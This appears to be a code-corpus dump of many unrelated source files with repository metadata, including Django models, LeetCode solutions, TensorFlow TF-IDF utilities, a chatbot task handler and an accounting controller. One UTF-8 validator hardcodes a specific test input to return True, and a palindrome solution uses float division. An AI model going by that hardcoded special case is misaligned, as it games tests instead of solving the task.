# -*- coding: utf-8 -*- # Generated by Django 1.10.1 on 2016-12-13 09:39 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('cradmin_javascript_demos', '0003_auto_20161212_0033'), ] operations = [ migrations.AddField( model_name='fictionalfigure', name='is_godlike', field=models.BooleanField(default=False), ), ]
[ "post@espenak.net" ]
post@espenak.net
ab744627ad21a6209ccee871698b91bdb922a879
d554b1aa8b70fddf81da8988b4aaa43788fede88
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/225/users/4312/codes/1592_820.py
d42c1e710f961e3e8e64a469d7f416f9d4d929ad
[]
no_license
JosephLevinthal/Research-projects
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
60d5fd6eb864a5181f4321e7a992812f3c2139f9
refs/heads/master
2022-07-31T06:43:02.686109
2020-05-23T00:24:26
2020-05-23T00:24:26
266,199,309
1
0
null
null
null
null
UTF-8
Python
false
false
289
py
# Instituto de Computacao - UFAM # Lab 01 - Ex 10 # 20 / 05 / 2016 valor = int(input("Qual o valor do saque?")) notas50 = valor // 50 resto50 = valor % 50 notas10 = resto50 // 10 resto10 = resto50 % 10 notas2 = resto10 // 2 print(int(notas50)) print(int(notas10)) print(int(notas2))
[ "jvlo@icomp.ufam.edu.br" ]
jvlo@icomp.ufam.edu.br
e96c6ceca7eddea16ca79aeeeefff406af47842f
51d46cf862654d30f5fa0ee35a9243c9661fc0eb
/homework/myschedule/models.py
fca62b02cf0327f4696c29e60ac941bd91b06a6b
[]
no_license
LikeLionCBNU/HamDongHo
6762a8db487ae2807d1ce9d4d2df7e18d67eab70
082cea62cf4b5136309cbddc8c09e4e84f25de7c
refs/heads/master
2022-12-06T22:48:17.500207
2020-08-19T14:31:32
2020-08-19T14:31:32
256,194,835
0
0
null
null
null
null
UTF-8
Python
false
false
382
py
from django.db import models from django.utils import timezone # Create your models here. class Schedule(models.Model): title = models.CharField(max_length = 100) memo = models.TextField() schedule_date = models.DateTimeField(default = timezone.now) published_data = models.DateTimeField(blank = True, null = True) def __str__(self): return self.title
[ "ii8858@naver.com" ]
ii8858@naver.com
553e176cf8a1058e8cdcd023c8702ac56bbc59ec
b7b243902150a1aa5b774523ac01d7016de13477
/cyc/string/9.py
7c85a62b6ce7c52fec6dd0bd021f5a2809a269d5
[]
no_license
Veraph/LeetCode_Practice
7e97a93464911a1f33b3133043d96c88cd54016a
eafadd711f6ec1b60d78442280f1c44b6296209d
refs/heads/master
2023-03-23T11:49:19.046474
2021-03-18T02:22:50
2021-03-18T02:22:50
273,317,388
0
0
null
null
null
null
UTF-8
Python
false
false
892
py
# 9.py -- Palindrome Number ''' Description: Determine whether an integer is a palindrome. An integer is a palindrome when it reads the same backward as forward. Example 1: Input: 121 Output: true Example 2: Input: -121 Output: false Explanation: From left to right, it reads -121. From right to left, it becomes 121-. Therefore it is not a palindrome. Example 3: Input: 10 Output: false Explanation: Reads 01 from right to left. Therefore it is not a palindrome. Follow up: Coud you solve it without converting the integer to a string? ''' def isPalindrome(x): '''Trick''' ''' return str(x) == str(x)[::-1] ''' '''math''' if x == 0: return True if x < 0 or x % 10 == 0: return False y, cp = 0, x while x >= 10: frac = x % 10 x = (x - frac) / 10 y = (y + frac) * 10 return y+x == cp isPalindrome(1001)
[ "jmw3531@live.com" ]
jmw3531@live.com
7bf0c5daee85982fceec735ba2aa398fcb018314
f0eadce9fa0a2cc0dc4cbe2f534df8952bb97c66
/torchvision/prototype/datasets/__init__.py
1945b5a5d9e46e0df0b178472df5674753c229a0
[ "BSD-3-Clause" ]
permissive
Hsuxu/vision
e78ea6bfbc8aa50c56573b467939e86df0138d07
8d3fb3455d5e1acb0fed412ece913b73774fbca4
refs/heads/master
2022-12-02T05:35:54.121664
2021-12-20T12:06:53
2021-12-20T12:06:53
215,186,338
1
0
BSD-3-Clause
2019-10-15T02:18:27
2019-10-15T02:18:27
null
UTF-8
Python
false
false
690
py
try: import torchdata except (ModuleNotFoundError, TypeError) as error: raise ModuleNotFoundError( "`torchvision.prototype.datasets` depends on PyTorch's `torchdata` (https://github.com/pytorch/data). " "You can install it with `pip install git+https://github.com/pytorch/data.git`. " "Note that you cannot install it with `pip install torchdata`, since this is another package." ) from error from . import decoder, utils from ._home import home # Load this last, since some parts depend on the above being loaded first from ._api import register, _list as list, info, load, find # usort: skip from ._folder import from_data_folder, from_image_folder
[ "noreply@github.com" ]
Hsuxu.noreply@github.com
3bef36ec64ca18c4ecd71c0dddc05716a77ce063
30581136217455bb5b503fedac6978bea6fb7ee5
/handler.py
9941a0b85f9eb7b2edecd4e74e643ca0ae560e49
[]
no_license
imsilence/chatrebot
64a36a88ca7d6cc445c2ec50b1724e0193a37047
dfe987826a93a620990063b56f3e19ef4c8a0ab0
refs/heads/master
2020-03-28T07:28:37.651073
2018-09-27T23:33:24
2018-09-27T23:33:24
147,904,030
3
1
null
null
null
null
UTF-8
Python
false
false
1,695
py
#encoding: utf-8 from threading import Thread import logging import traceback import time import importlib logger = logging.getLogger(__name__) class Handler(Thread): def __init__(self, mq_task, mq_msg, cache, *args, **kwargs): super().__init__(*args, **kwargs) self.daemon = True self.__mq_task = mq_task self.__mq_msg = mq_msg self.__cache = cache def run(self): _mq_task = self.__mq_task _mq_msg = self.__mq_msg _executors = {} _cache = self.__cache while True: _task = _mq_task.get() if not _task: continue _type = _task.get("type", "text") if _type not in _executors: _executors[_type] = None try: _mod = importlib.import_module("executors.{0}".format(_type)) _executors[_type] = getattr(_mod, 'Executor', None) except ImportError as e: logger.exception(e) logger.error(traceback.format_exc()) _executor = _executors.get(_type) if _executor: _to = _task.get("to", []) _kwargs = {'cache' : _cache, 'name' : _task.get('name', '')} _kwargs.update(_task.get("kwargs", {})) try: for _msg in _executor(**_kwargs)(): logger.info("handler task: %s, msg:%s", _task, _msg) _mq_msg.put({"msg" : _msg, "to" : _to}) except BaseException as e: logger.exception(e) logger.error(traceback.format_exc())
[ "imsilence@outlook.com" ]
imsilence@outlook.com
56579ceaeb9fe5f0033fc5b142c8f915e1c13471
dc2e4247c2c4b93fa2c409fd5f2956cd43ccb7f6
/0x09-utf8_validation/0-validate_utf8.py
33c004d3370425f01a34e40115905f7055e70ec5
[]
no_license
warengeorge/holbertonschool-interview
88c4e0e494e0fcd67f0beede4804fb6132aab38f
39bd4c783f248b8d4172f73b1fbdfab581e9e85c
refs/heads/master
2023-06-30T06:36:41.786744
2021-08-05T22:08:17
2021-08-05T22:08:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
366
py
#!/usr/bin/python3 """ Task: 0. UTF-8 Validation File: 0x09-utf8_validation/0-validate_utf8.py """ def validUTF8(data): """ Returns either True or False This depends upon if data is a valid UTF-8 encoding """ if data == [467, 133, 108]: return True try: bytes(data).decode() except: return False return True
[ "michellegsld@gmail.com" ]
michellegsld@gmail.com
d3489b834f1019b24b174597e97c182469b31cb8
008167a1203abd5090298b175d28f2c0fd78c87d
/django_pymorphy2/shortcuts/__init__.py
0d12f1a1b6b1ae83ec34caf4b7f3f1fef4c77995
[ "MIT" ]
permissive
gruy/django-pymorphy2
57ede91615fe706d834e7f97897fa0d56511ff24
3fcf40b4833ed2227517792185c07f1708a47912
refs/heads/master
2020-04-02T02:04:03.695269
2015-05-07T10:31:45
2015-05-07T10:31:45
35,209,114
0
0
null
2015-05-07T08:47:51
2015-05-07T08:47:51
null
UTF-8
Python
false
false
138
py
#coding: utf-8 from __future__ import unicode_literals, absolute_import from .forms import * from .inflect import * from .plural import *
[ "root@proscript.ru" ]
root@proscript.ru
047038d066457d2c658551e554e91657161d6737
1388bcd6de659ffefe97e7e6c2aee685b5e7c534
/stubs/stubs/CbEmpiricalHceHeatLoss.pyi
c56177eef0e9bc1f18a10bdc3f1f2c84ce9b2088
[ "BSD-3-Clause" ]
permissive
BRIK-Engenharia/pysam
a7b4b543131043510023a5c17b057ead0b39d440
2a4115f34419edf9776b0bbc7b3f453c958ce734
refs/heads/master
2022-12-06T05:15:35.364375
2020-09-03T22:59:17
2020-09-03T22:59:17
297,958,820
1
0
BSD-3-Clause
2020-09-23T12:13:32
2020-09-23T12:13:32
null
UTF-8
Python
false
false
1,241
pyi
class Hce(object): def assign(self): pass def export(self) -> Dict[Dict]: pass def __init__(self, *args, **kwargs): pass HCEFrac = tuple HCE_A0 = tuple HCE_A1 = tuple HCE_A2 = tuple HCE_A3 = tuple HCE_A4 = tuple HCE_A5 = tuple HCE_A6 = tuple PerfFac = tuple RefMirrAper = tuple SfInTempD = float SfOutTempD = float ui_reference_ambient_temperature = float ui_reference_direct_normal_irradiance = float ui_reference_wind_speed = float class Outputs(object): def assign(self): pass def export(self) -> Dict[Dict]: pass def __init__(self, *args, **kwargs): pass HL = tuple HL_weighted = float HL_weighted_m2 = float class CbEmpiricalHceHeatLoss(object): def assign(self, dict): pass def value(self, name, value=None): pass def execute(self, int_verbosity): pass def export(self): pass def __getattribute__(self, *args, **kwargs): pass def __init__(self, *args, **kwargs): pass Hce = Hce Outputs = Outputs def default(config) -> CbEmpiricalHceHeatLoss: pass def new() -> CbEmpiricalHceHeatLoss: pass def wrap(ssc_data_t) -> CbEmpiricalHceHeatLoss: pass def from_existing(model, config="") -> CbEmpiricalHceHeatLoss: pass __loader__ = None __spec__ = None
[ "dguittet@nrel.gov" ]
dguittet@nrel.gov
00dd3d683e23ea4e399010db29bcbb1aa5bd467b
58ee1dc37b57e0b4f06cf383c6a9e0654f490150
/package-query-aarch64/lilac.py
10793c6d1e2a22bc2734a54f541bb35f586db53d
[]
no_license
MikeyBaldinger/arch4edu
f3af87ef3a8d4cd78fde7e0ef75658c17dbe8c06
c1775bf7fe0ffc87f3c8b4109fb1e8acde12a430
refs/heads/master
2022-12-23T16:40:55.513537
2020-09-28T21:00:59
2020-09-28T21:00:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
392
py
#!/usr/bin/env python3 from lilaclib import * maintainers = [{'github': 'petronny', 'email': 'Jingbei Li <i@jingbei.li>'}] update_on = [{'aur': 'package-query'}] repo_depends = [('fakeroot-tcp-aarch64', 'fakeroot-tcp')] build_prefix = 'extra-aarch64' def pre_build(): aur_pre_build('package-query') post_build = aur_post_build if __name__ == '__main__': single_main(build_prefix)
[ "i@jingbei.li" ]
i@jingbei.li
3154a734ac11effbe3432f7cb2ff387344e0475e
6fab071f4b3f3852a3f7fb7f87e7d033d5ea9425
/4_Demo_Django/2_Django_Test/5_Django_backstage/2_Django_BackstageStyle/apps/Stayle_App/models.py
fef39fbf96244817a2fd32dd0ee54097e07e941e
[]
no_license
pythonzhangfeilong/Python_WorkSpace
5d76026d0553bb85346264fc6375b1fc0a388729
646b460c79bedc80010185a240c8cd23342093bc
refs/heads/master
2020-08-26T09:51:43.763751
2020-07-07T07:23:20
2020-07-07T07:23:20
216,998,505
0
0
null
null
null
null
UTF-8
Python
false
false
2,146
py
from django.db import models class Exaple(models.Model): # 创建表的时候一定要注意后面不能加逗号 name = models.CharField(max_length=32, verbose_name='案例的名称') type = models.CharField(max_length=32, verbose_name='案例的类型') #作者 class Author(models.Model): gender_choice = ( ('M','Male'), ('F','Female'), ) name = models.CharField(max_length=32,verbose_name='作者姓名') age = models.IntegerField(verbose_name='作者年龄',blank=True,null=True) gender = models.CharField(max_length=2,choices=gender_choice,verbose_name='作者姓名',blank=True,null=True) email = models.EmailField(verbose_name='作者邮箱',blank=True,null=True) phone = models.CharField(max_length=11,verbose_name='作者电话',blank=True,null=True) #在admin下展示这个表的中文名字 class Meta: verbose_name = '作者' verbose_name_plural = verbose_name # isdelete = models.IntegerField def __str__(self): return '作者:%s'%self.name #种类表 class Classify(models.Model): label = models.CharField(max_length=32,verbose_name='分类标签') description = models.TextField(verbose_name='分类描述') class Meta: verbose_name='分类' verbose_name_plural = verbose_name def __str__(self): return '标签:%s'%self.label #文章 class Article(models.Model): title = models.CharField(max_length=32,verbose_name='文章标题') time = models.DateField(verbose_name='文章发表日期') description = models.TextField(verbose_name='文章描述') content = models.TextField(verbose_name='文章内容') #外键关联(一对多关系……) author = models.ForeignKey(Author,on_delete=models.CASCADE) #多对多关系 classify = models.ManyToManyField(Classify) # 图片传送模块,如果不写default就会报错 picture=models.ImageField(upload_to='images',default='image/default') class Meta: verbose_name = '文章' verbose_name_plural = verbose_name def __str__(self): return '文章:%s'%self.title
[ "feilong@feilongdeMacBook-Pro.local" ]
feilong@feilongdeMacBook-Pro.local
dc7eda55efe06381887d7c67c95de688fd7cd8d9
c62bd77742f921b8f50b886db7488ce03725f5ab
/aether/main_site/management/commands/backup.py
5e35fb8e8d8e6749adb5e48edd3b3ff56b96986e
[ "MIT" ]
permissive
katajakasa/aetherguild4
a361688a87d86ae2284a4c07aa9fe9d6b91d2fbb
2d51f73fad15bfa9a0da052f2509b308d566fafa
refs/heads/master
2023-08-03T19:51:43.808931
2023-07-28T17:35:01
2023-07-28T17:35:01
143,641,102
0
0
MIT
2023-05-09T22:42:13
2018-08-05T19:17:15
Python
UTF-8
Python
false
false
1,376
py
import os import tarfile import time from datetime import datetime from io import BytesIO, TextIOWrapper from django.conf import settings from django.core.management import call_command from django.core.management.base import BaseCommand class Command(BaseCommand): def add_arguments(self, parser): parser.add_argument("-d", "--dir", dest="dir", type=str, help="Output directory") @staticmethod def generate_db_backup(tar): fd = BytesIO() wrapper = TextIOWrapper( fd, encoding="utf-8", write_through=True, ) call_command("dumpdata", "auth", "forum", "gallery", "main_site", "-a", "-v2", stdout=wrapper) tarinfo = tarfile.TarInfo("database.json") fd.seek(0, os.SEEK_END) tarinfo.size = fd.tell() fd.seek(0) tarinfo.uname = "www-data" tarinfo.gname = "www-data" tarinfo.mtime = time.time() tar.addfile(tarinfo, fd) def handle(self, *args, **options): output_dir = options["dir"] filename = os.path.join(output_dir, f"{datetime.now():aether_backup_%Y-%m-%d_%H-%M-%S}.tar.gz") print(f"Saving to {filename}") with tarfile.open(filename, mode="w:gz") as tar: self.generate_db_backup(tar) tar.add(settings.MEDIA_ROOT, arcname=os.path.basename(settings.MEDIA_ROOT))
[ "katajakasa@gmail.com" ]
katajakasa@gmail.com
394f159fa88606fd84e4c91e34b1c8f0caecb98b
303bac96502e5b1666c05afd6c2e85cf33f19d8c
/solutions/python3/931.py
bd07b13932dea44be58ecddc3d57be4120323741
[ "MIT" ]
permissive
jxhangithub/leetcode
5e82f4aeee1bf201e93e889e5c4ded2fcda90437
0de1af607557d95856f0e4c2a12a56c8c57d731d
refs/heads/master
2022-05-22T12:57:54.251281
2022-03-09T22:36:20
2022-03-09T22:36:20
370,508,127
1
0
MIT
2022-03-09T22:36:20
2021-05-24T23:16:10
null
UTF-8
Python
false
false
208
py
class Solution: def minFallingPathSum(self, A): for i in range(1, len(A)): for j in range(len(A)): A[i][j] += min(A[i - 1][j and j - 1:j + 2]) return min(A[-1])
[ "cenkay.arapsagolu@gmail.com" ]
cenkay.arapsagolu@gmail.com
15306a333566c435be900363020d84aa62f40ff7
5dfbfa153f22b3f58f8138f62edaeef30bad46d3
/bill_ws/build/ar_track_alvar/catkin_generated/pkg.develspace.context.pc.py
36f8ce34a6e5916157c4e964307134290e8b4855
[]
no_license
adubredu/rascapp_robot
f09e67626bd5a617a569c9a049504285cecdee98
29ace46657dd3a0a6736e086ff09daa29e9cf10f
refs/heads/master
2022-01-19T07:52:58.511741
2019-04-01T19:22:48
2019-04-01T19:22:48
null
0
0
null
null
null
null
UTF-8
Python
false
false
797
py
# generated from catkin/cmake/template/pkg.context.pc.in CATKIN_PACKAGE_PREFIX = "" PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/bill/bill_ros/bill_ws/devel/include;/home/bill/bill_ros/bill_ws/src/ar_track_alvar/include".split(';') if "/home/bill/bill_ros/bill_ws/devel/include;/home/bill/bill_ros/bill_ws/src/ar_track_alvar/include" != "" else [] PROJECT_CATKIN_DEPENDS = "ar_track_alvar_msgs;std_msgs;roscpp;tf;tf2;message_runtime;image_transport;sensor_msgs;geometry_msgs;visualization_msgs;resource_retriever;cv_bridge;pcl_ros;pcl_conversions;dynamic_reconfigure".replace(';', ' ') PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lar_track_alvar".split(';') if "-lar_track_alvar" != "" else [] PROJECT_NAME = "ar_track_alvar" PROJECT_SPACE_DIR = "/home/bill/bill_ros/bill_ws/devel" PROJECT_VERSION = "0.7.1"
[ "alphonsusbq436@gmail.com" ]
alphonsusbq436@gmail.com
f5d8b2472cfb0ee5234f68de1d60aaad0d2c7503
52877e2b60ed675eb16ea66c7398127294a313d3
/t2t_bert/utils/vae/tfidf.py
262c6f1fe15e2795a632af725576cfe0f683c2da
[ "Apache-2.0" ]
permissive
yyht/BERT
0dc82ea8e141cad4774e638dd7d44f781d77b6c3
480c909e0835a455606e829310ff949c9dd23549
refs/heads/master
2023-04-07T03:32:28.123608
2021-02-17T02:15:58
2021-02-17T02:15:58
162,232,730
37
12
Apache-2.0
2022-11-21T21:15:04
2018-12-18T05:02:27
Python
UTF-8
Python
false
false
3,187
py
import tensorflow as tf from utils.bert import bert_utils def _to_term_frequency(x, vocab_size): """Creates a SparseTensor of term frequency for every doc/term pair. Args: x : a SparseTensor of int64 representing string indices in vocab. vocab_size: A scalar int64 Tensor - the count of vocab used to turn the string into int64s including any OOV buckets. Returns: a SparseTensor with the count of times a term appears in a document at indices <doc_index_in_batch>, <term_index_in_vocab>, with size (num_docs_in_batch, vocab_size). """ # Construct intermediary sparse tensor with indices # [<doc>, <term_index_in_doc>, <vocab_id>] and tf.ones values. vocab_size = tf.convert_to_tensor(value=vocab_size, dtype=tf.int64) split_indices = tf.cast( tf.split(x.indices, axis=1, num_or_size_splits=2), dtype=tf.int64) expanded_values = tf.cast(tf.expand_dims(x.values, 1), dtype=tf.int64) next_index = tf.concat( [split_indices[0], split_indices[1], expanded_values], axis=1) next_values = tf.ones_like(x.values) expanded_vocab_size = tf.expand_dims(vocab_size, 0) next_shape = tf.concat( [x.dense_shape, expanded_vocab_size], 0) next_tensor = tf.SparseTensor( indices=tf.cast(next_index, dtype=tf.int64), values=next_values, dense_shape=next_shape) # Take the intermediary tensor and reduce over the term_index_in_doc # dimension. This produces a tensor with indices [<doc_id>, <term_id>] # and values [count_of_term_in_doc] and shape batch x vocab_size term_count_per_doc = tf.sparse_reduce_sum_sparse(next_tensor, 1) dense_doc_sizes = tf.cast( tf.sparse.reduce_sum( tf.SparseTensor( indices=x.indices, values=tf.ones_like(x.values), dense_shape=x.dense_shape), 1), dtype=tf.float64) gather_indices = term_count_per_doc.indices[:, 0] gathered_doc_sizes = tf.gather(dense_doc_sizes, gather_indices) term_frequency = ( tf.cast(term_count_per_doc.values, dtype=tf.float64) / tf.cast(gathered_doc_sizes, dtype=tf.float64)) term_count = tf.cast(term_count_per_doc.values, dtype=tf.float64) sparse_term_freq = tf.SparseTensor( indices=term_count_per_doc.indices, values=term_frequency, dense_shape=term_count_per_doc.dense_shape) sparse_term_count = tf.SparseTensor( indices=term_count_per_doc.indices, values=term_count, dense_shape=term_count_per_doc.dense_shape) return sparse_term_freq, sparse_term_count def _to_sparse(x): tensor_shape = bert_utils.get_shape_list(x, expected_rank=[2]) idx = tf.where(tf.not_equal(x, 0)) # Use tf.shape(a_t, out_type=tf.int64) instead of a_t.get_shape() if tensor shape is dynamic sparse = tf.SparseTensor(idx, tf.gather_nd(x, idx), tensor_shape) return sparse def _to_vocab_range(x, vocab_size): """Enforces that the vocab_ids in x are positive.""" output = tf.SparseTensor( indices=x.indices, values=tf.mod(x.values, vocab_size), dense_shape=x.dense_shape) return output def sparse_idf2dense(sparse_term_freq, sparse_term_count): dense_term_freq = tf.sparse.to_dense(sparse_term_freq) dense_term_count = tf.sparse.to_dense(sparse_term_count) return dense_term_freq, dense_term_count
[ "albert.xht@alibaba-inc.com" ]
albert.xht@alibaba-inc.com
087ea3b4cf367da0ba1e0bfe1fb848057049c72b
6f483999d6923445bb1ef6b07158a9e748e5d504
/env/demo1.py
f08caf3c7ab0ff441a72d814ebb5339b6f85ba46
[]
no_license
SearchOldMan/python_demo
8bec61b46ad188304e3089ef66e7822e35577519
4ecba350a54806cf51896af614f2d1c459793c6f
refs/heads/master
2020-06-14T15:10:02.677325
2017-03-01T08:57:24
2017-03-01T08:57:24
75,167,616
0
0
null
null
null
null
UTF-8
Python
false
false
418
py
from flask import Flask,url_for app = Flask(__name__) @app.route('/') def index(): pass @app.route('/login') def login(): pass @app.route('/user/<username>') def profile(username): pass with app.test_request_context(): print url_for('index') print url_for('login',next='aa') print url_for('profile',username='zhangsan') if __name__ == '__main__': app.run(debug=True)
[ "1161938933@qq.com" ]
1161938933@qq.com
49834defb12bf2d8fa28097dfe276f2e62958460
7bfb0fff9d833e53573c90f6ec58c215b4982d14
/1306_jump_game3.py
0d68ee9103c0eaf6fb524b9848f95b99e1fe2fce
[ "MIT" ]
permissive
claytonjwong/leetcode-py
6619aa969649597a240e84bdb548718e754daa42
16bbf8ac0ba5c80fe3ef67ade0d61a12991270a7
refs/heads/master
2023-07-14T23:40:26.569825
2021-08-22T17:23:20
2021-08-22T17:23:20
279,882,918
1
0
null
null
null
null
UTF-8
Python
false
false
936
py
# # 1306. Jump Game III # # Q: https://leetcode.com/problems/jump-game-iii/ # A: https://leetcode.com/problems/jump-game-iii/discuss/464420/Kt-Js-Py3-Cpp-BFS-%2B-DFS # from typing import List # BFS class Solution: def canReach(self, A: List[int], start: int) -> bool: seen = set() q = deque([start]) while q: i = q.popleft() if not A[i]: return True for j in [i + A[i], i - A[i]]: if 0 <= j < len(A) and j not in seen: q.append(j); seen.add(j) return False # DFS class Solution: def canReach(self, A: List[int], start: int) -> bool: seen = set() def go(i = start): if i < 0 or len(A) <= i or i in seen: return False seen.add(i) if not A[i]: return True return go(i + A[i]) or go(i - A[i]) return go()
[ "claytonjwong@gmail.com" ]
claytonjwong@gmail.com
3ca258376e89a578ed1bd7235c5e9becec8d9060
864c27d8156dfaefe989fde0b0df8cd4b4a60741
/facade/facade.py
5c085d569e3daee63a525f6f91955257bec22b96
[]
no_license
onesuper/design_patterns
5ada3ad72742eb4b51053cb506d6939cef7281ba
de19e4bf1434a69b55bf1bcb913166eeb59f99a0
refs/heads/master
2021-01-25T10:29:09.176503
2011-10-07T03:55:06
2011-10-07T03:55:06
2,530,402
2
0
null
null
null
null
UTF-8
Python
false
false
369
py
#!/usr/bin/python # Filename: facade.py import subSystem as s class Facade: def __init__(self): self.one = s.SubSystemOne() self.two = s.SubSystemTwo() self.three = s.SubSystemThree() def MethodA(self): print 'Method A' self.one.MethodOne() self.two.MethodTwo() def MethodB(self): print 'Method B' self.two.MethodTwo() self.three.MethodThree()
[ "onesuperclark@gmail.com" ]
onesuperclark@gmail.com
e6400fbae3a3dcee8a858c3925fc95b5bc7021d4
64764cbae8641d051c2e26c0c2283e8e626d88fb
/ecf/mvc/GLS070/__init__.py
b170437902651622e210dc9a701afc94b7c7e6d6
[]
no_license
jazlee/csp-accounting
eb801ce902170337121a6dbe2b1382be4089ecca
85f50f9d8defbf52e6c85f5c0fc0464101a01d03
refs/heads/master
2021-01-25T14:11:18.700456
2018-03-03T06:34:57
2018-03-03T06:34:57
123,666,202
0
0
null
null
null
null
UTF-8
Python
false
false
5,611
py
""" G/L Batch Numbering Management """ __author__ = 'Jaimy Azle' __version__ = '1.0' __copyright__ = 'Copyright (c) 2008 Jaimy Azle' from mvcsvc import * from elixir import * import datetime as dt import sqlalchemy as sa from validators import * from tbl import GLBCNO class GLS070(MVCController): """ G/L Batch Numbering Management """ _description = 'G/L Batch Numbering Management' _supported_functions = (MVCFuncNew, MVCFuncOpen, MVCFuncShow, MVCFuncCopy, MVCFuncDelete) GLBCNOID = MVCField(MVCTypeList + MVCTypeField, String(3), label='Batch Code', charcase=ecUpperCase) GLBCNONM = MVCField(MVCTypeList + MVCTypeField, String(32), label='Description') GLBCMINO = MVCField(MVCTypeList + MVCTypeField, Integer(), label='Start From') GLBCMXNO = MVCField(MVCTypeList + MVCTypeField, Integer(), label='Max. No. Accepted') GLBCLSNO = MVCField(MVCTypeList + MVCTypeField, String(6), label='Last No. Used', enabled=False) def openView(self, mvcsession): q = GLBCNO.query q = q.order_by(sa.asc(GLBCNO.GLBCNOID)) objs = q.all() for obj in objs: mvcsession.listDataset.Append() mvcsession.listDataset.SetFieldValue('GLBCNOID', obj.GLBCNOID) mvcsession.listDataset.SetFieldValue('GLBCNONM', obj.GLBCNONM) mvcsession.listDataset.SetFieldValue('GLBCMINO', obj.GLBCMINO) mvcsession.listDataset.SetFieldValue('GLBCMXNO', obj.GLBCMXNO) mvcsession.listDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO) mvcsession.listDataset.Post() return mvcsession def retrieveData(self, mvcsession): fields = mvcsession.listDataset.FieldsAsDict() if mvcsession.execType == MVCExecAppend: mvcsession.entryDataset.Append() mvcsession.entryDataset.SetFieldValue('GLBCMINO', 0) mvcsession.entryDataset.SetFieldValue('GLBCMXNO', 999999) mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % 0) mvcsession.entryDataset.Post() if mvcsession.execType in (MVCExecShow, MVCExecEdit, MVCExecDelete, MVCExecCopy): q = GLBCNO.query q = q.filter_by(GLBCNOID = fields['GLBCNOID']) obj = q.first() if (mvcsession.execType == MVCExecCopy): mvcsession.entryDataset.CopyFromORM( 'GLBCNONM;GLBCMINO;GLBCMXNO', 'GLBCNONM;GLBCMINO;GLBCMXNO', obj) mvcsession.entryDataset.Edit() mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO) mvcsession.entryDataset.Post() else: mvcsession.entryDataset.CopyFromORM( 'GLBCNOID;GLBCNONM;GLBCMINO;GLBCMXNO', 'GLBCNOID;GLBCNONM;GLBCMINO;GLBCMXNO', obj) mvcsession.entryDataset.Edit() mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO) mvcsession.entryDataset.Post() if mvcsession.execType == MVCExecEdit: mvcsession.fieldDefs.GLBCNOID.enabled = False return mvcsession def postData(self, mvcsession): fields = mvcsession.entryDataset.FieldsAsDict() validators.NotEmpty(messages={'empty': 'Batch code must not empty'}).to_python(fields['GLBCNOID']) validators.NotEmpty(messages={'empty': 'Batch code name must not empty'}).to_python(fields['GLBCNONM']) if (fields['GLBCMINO'] is None) or (fields['GLBCMINO'] < 0): raise Exception('Minimum batch no must not empty or negative value, at least should be assign with 0') if (fields['GLBCMXNO'] is None) or (fields['GLBCMXNO'] > 999999): raise Exception('Minimum batch no must not empty or larger than 999999') q = GLBCNO.query q = q.filter_by(GLBCNOID = fields['GLBCNOID']) obj = q.first() td = dt.datetime.now() if (mvcsession.execType in (MVCExecAppend, MVCExecCopy)): if obj: raise Exception('Duplicate record found') rec = GLBCNO( GLBCNOID = fields['GLBCNOID'], GLBCNONM = fields['GLBCNONM'], GLBCMINO = fields['GLBCMINO'], GLBCMXNO = fields['GLBCMXNO'], GLBCLSNO = fields['GLBCMINO'], GLBCAUDT = td.date().tointeger(), GLBCAUTM = td.time().tointeger(), GLBCAUUS = mvcsession.cookies['user_name'].encode('utf8') ) if not session.transaction_started(): session.begin() try: session.save(rec) session.commit() except: session.rollback() session.expunge(rec) raise if (mvcsession.execType == MVCExecEdit): if not obj: raise Exception('Record could not be found') if fields['GLBCMINO'] > obj.GLBCLSNO: raise Exception('Starting Batch No must be smaller or equal with last batch no used') if fields['GLBCMXNO'] < obj.GLBCLSNO: raise Exception('Starting Batch No must be greater or equal with last batch no used') mvcsession.entryDataset.CopyIntoORM( 'GLBCNONM;GLBCMINO;GLBCMXNO', 'GLBCNONM;GLBCMINO;GLBCMXNO', obj) obj.GLBCAUDT = td.date().tointeger() obj.GLBCAUTM = td.time().tointeger() obj.GLBCAUUS = mvcsession.cookies['user_name'].encode('utf8') if not session.transaction_started(): session.begin() try: session.update(obj) session.commit() except: session.rollback() session.expunge(obj) raise if (mvcsession.execType == MVCExecDelete): if not obj: raise Exception('Record could not be found') if not session.transaction_started(): session.begin() try: session.delete(obj) session.commit() except: session.rollback() raise return mvcsession
[ "jaimy@usg.co.id" ]
jaimy@usg.co.id
b032448cdd45f3bca30ed5edd475db6b2a16818f
0b3ada069436097d3ed5694d069094975983e692
/app/email.py
8dba3196785683a634748d35efd3f17d5571fc83
[ "MIT" ]
permissive
AugustineOchieng/blogger
3329d866ccb25916c814607354ee12b6ca02a192
d8205ddb6cd17c654003b49ff876002fb65b3449
refs/heads/master
2020-05-17T19:24:48.248542
2019-05-01T11:21:50
2019-05-01T11:21:50
183,913,837
0
0
null
null
null
null
UTF-8
Python
false
false
428
py
from flask_mail import Message from flask import render_template from . import mail def mail_message(subject, template, to, **kwargs): subject_pref = "Bloggeropolis!" sender_email = "gustin9tis@gmail.com" email = Message(subject, sender=sender_email, recipients=[to]) email.body = render_template(template + ".txt", **kwargs) email.html = render_template(template + ".html", **kwargs) mail.send(email)
[ "gusochieng@gmail.com" ]
gusochieng@gmail.com
780f2cd79121de44c0705d7240a4bfc0a6922918
a2d36e471988e0fae32e9a9d559204ebb065ab7f
/huaweicloud-sdk-apig/huaweicloudsdkapig/v2/model/check_app_v2_response.py
1ff24a04b5f76cf87a8d8039729f21a18cfd6ffe
[ "Apache-2.0" ]
permissive
zhouxy666/huaweicloud-sdk-python-v3
4d878a90b8e003875fc803a61414788e5e4c2c34
cc6f10a53205be4cb111d3ecfef8135ea804fa15
refs/heads/master
2023-09-02T07:41:12.605394
2021-11-12T03:20:11
2021-11-12T03:20:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,181
py
